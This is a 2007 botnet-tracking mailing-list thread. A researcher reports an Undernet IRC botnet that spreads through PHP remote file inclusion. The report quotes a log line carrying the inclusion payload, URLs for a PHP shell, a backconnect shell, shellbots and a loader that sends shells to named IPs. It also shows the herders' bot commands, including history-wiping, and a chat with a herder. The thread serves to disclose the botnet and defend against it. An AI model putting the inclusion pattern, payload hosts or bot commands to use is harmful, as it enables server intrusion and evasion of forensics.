Re: [botnets] Another botnet on eu.undernet.org

Wed, 21 Mar 2007 10:06:29 -0800 

To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
List, 
    I already have access to a list of C&C servers, but there is a list that
I am missing. I'm very interested in getting a list of the IP addresses that
the bots themselves are connecting from. Ie: What systems specifically did
they infect? Is there a way to get such a list?


On 3/21/07 2:03 PM, "David Vorel" <[EMAIL PROTECTED]> wrote:

> To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
> ----------
> 
> Hi all, 
> 
> nice shot Bodik ;] I found different botnet on eu.undernet.org chan #vx8 it's
> linux
> zombie based botnet spreads throught various bugs in PHP. Undernet
> admins please take look on it. Description follows. Botnet herders are
> Denzel, xeQt, aslpls-.
> 
> 
> First attempt: 
> 
> 85.17.11.53 - - [20/Mar/2007:04:10:41 +0100] "GET
> /index.php?loc=http://nawader.org/modules/Top/kgb.c? HTTP/1.1" 200 132
> "-" "libwww-perl/5.79"
> 
> We mirror all links included, engine for RFI source is not completed
> yet, so for this time I send row urls.
> 
> http://nawader.org/modules/Top/kgb.c
> http://www.honeynet.cz/bots/5249235d1476c24250130da98b9a34b5.txt
> - PHP shell which includes other links
> 
> http://nawader.org/modules/Top/bc.txt
> http://www.honeynet.cz/bots/4456038f56e4b71b01ed0a348cbfeb41.txt
> - Backconnect shell
> 
> http://nawader.org/modules/Top/n.txt
> http://www.honeynet.cz/bots/adc704f9697cdf89da9d503b11f9787d.txt
> - Shellbot I, connect to eu.undernet.org #vx8
> 
> http://nawader.org/modules/Top/teamrx
> http://www.honeynet.cz/bots/68f984e9f37e3911b92493cbb9b04aef.txt
> - Loader for n.txt and bc.txt run backconnect and send shell to
>   220.232.137.199 and 64.38.11.130
> 
> 
> http://nawader.org/modules/Top/toyo.txt
> http://www.honeynet.cz/bots/80d97c973062d7d2d369f5f79578a597.txt
> - Shellbot II, connect to eu.undernet.org #vx8
> 
> 
> 
> All scripts are labelled "xeQt vS TeaMrx".
> 
> Who on chan:
> 
> http://www.honeynet.cz/trash/list
> 
> After while on channel bot herders move bots to another chan.
> 
> #vx8 :<@xeQt> !x !join #perljunkies aV5&bvhyI
> #vx8 :<@xeQt> !x !join #mp3fulls 209x5Vi.
> 
> 
> 
> Here is list from uname -sr.
> 
> http://www.honeynet.cz/trash/uname
> 
> 
> 
> 
> chat: 
> 
> <crop>
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im no geek i tould
>>> u
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im a criminal
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :make shit
> << PRIVMSG #vx8 :i now that you are criminal
> << PRIVMSG #vx8 :but still on free ?
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :nothings free
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :$$
> << PRIVMSG xeQt :^AVERSION^A
>>> :[EMAIL PROTECTED] NOTICE nirgil :^AVERSION mIRC
>>> v6.17 Khaled Mardam-Bey^A
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :its my life
> << PRIVMSG #vx8 :jail is for free
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i know
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im going sooon
> << PRIVMSG #vx8 :y are waiting for ?
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :its full
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :a few months
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im no murder, so i
>>> goto wait
> </crop>
> 
> <crop>
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :thats a trickey one
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :cuz i dont touch
>>> any of the servers
> << PRIVMSG #vx8 :when u installed your script throught bug in php that's
> touching too
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 ::)))
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i tould you
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :its magic
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont connect to
>>> anything
> << PRIVMSG #vx8 :yes u did
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :no i  didn't
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :all the bots do my
>>> job
> << PRIVMSG #vx8 :and that is ?
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :you know what mass
>>> spread is?
> << PRIVMSG #vx8 :<@xeQt> !x !join #perljunkies aV5&bvhyI
> << PRIVMSG #vx8 :and what about this ?
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :so?
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :how you get this ip
>>> address from that?
> << PRIVMSG #vx8 :this command is better one..
> << PRIVMSG #vx8 :<@xeQt> !x uname -sr
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :!x id
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :uid=33949(nucsaor)
>>> gid=33952(nucsaor) groups=33952(nucsaor)
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :uid=33(www-data)
>>> gid=33(www-data) groups=33(www-data)
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :like that?
>>> :[EMAIL PROTECTED] PRIVMSG #vx8
>>> :uid=80(www) gid=80(www) groups=80(www)
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :uid=80(www)
>>> gid=80(www) groups=80(www)
> << PRIVMSG #vx8 :yes, now you are in direct connect with these servers
> ..
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont think you
>>> have no clue man
> << PRIVMSG #vx8 :thats the point of abuse ..
> << PRIVMSG #vx8 :these servers are yours ?
> << PRIVMSG #vx8 :or not ?
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i understand your
>>> pissed off, but this is useless
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :call the cops, make
>>> them trace me... but its useless
> << PRIVMSG #vx8 :I think that all servers here are used to fraud ..
> << PRIVMSG #vx8 :i dont think so ..
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :!x unset HISTFILE
>>> HISTSAVE
> << PRIVMSG #vx8 :heh
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :o_0
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont see how you
>>> get ip from that
> << PRIVMSG #vx8 :from what ?
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :David Hac?
> << PRIVMSG #vx8 :?
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :David Hac
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :man
> << PRIVMSG #vx8 :what ?
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :good luck hunting
>>> me
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :with feds
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :its useless
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :for sure
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :but do it.. i dont
>>> say no but.. goood luck
> << PRIVMSG #vx8 :i'm not hunting you, thats work for authorities.
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :yes
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :goood
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i like a channelge
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :challenge
> << PRIVMSG #vx8 :so what for now ?
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont need to
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :why wold i do that?
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im the bitch, you
>>> the victum..
> << PRIVMSG #vx8 :i'm not victim ..
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :you hunt me
> << PRIVMSG #vx8 :others are victims ..
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :your right
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :you a cop?
> << PRIVMSG #vx8 :yes
> << PRIVMSG #vx8 :;]
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :and?
>>> :[EMAIL PROTECTED] NICK :CopKiller
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :what you gonna do
>>> about it?
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :call your friends,
>>> girlfriends....
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :cuz i dont give a
>>> fuck
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :here i kick cops
> << PRIVMSG #vx8 :so kick me dude ;]
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :dont need to
> << PRIVMSG #vx8 :heh
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :come here and ill
>>> show you
> << PRIVMSG #vx8 :i'm here
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :in my hoood
>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :not mirc
> </crop>
> 
> Cheers.. 
> 
> David Vorel
> 
> _______________________________________________
> To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
> All list and server information are public and available to law enforcement
> upon request.
> http://www.whitestar.linuxbox.org/mailman/listinfo/botnets

-- 

Regards, 
    Adriel T. Desautels
    Chief Technology Officer - Netragard, LLC
    Office: 617-934-0269 || Mobile : 857-636-8882
    http://www.linkedin.com/pub/1/118/a45
    http://www.netragard.com
    -------------------------
    "We make IT secure."


_______________________________________________
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement 
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets

Reply via email to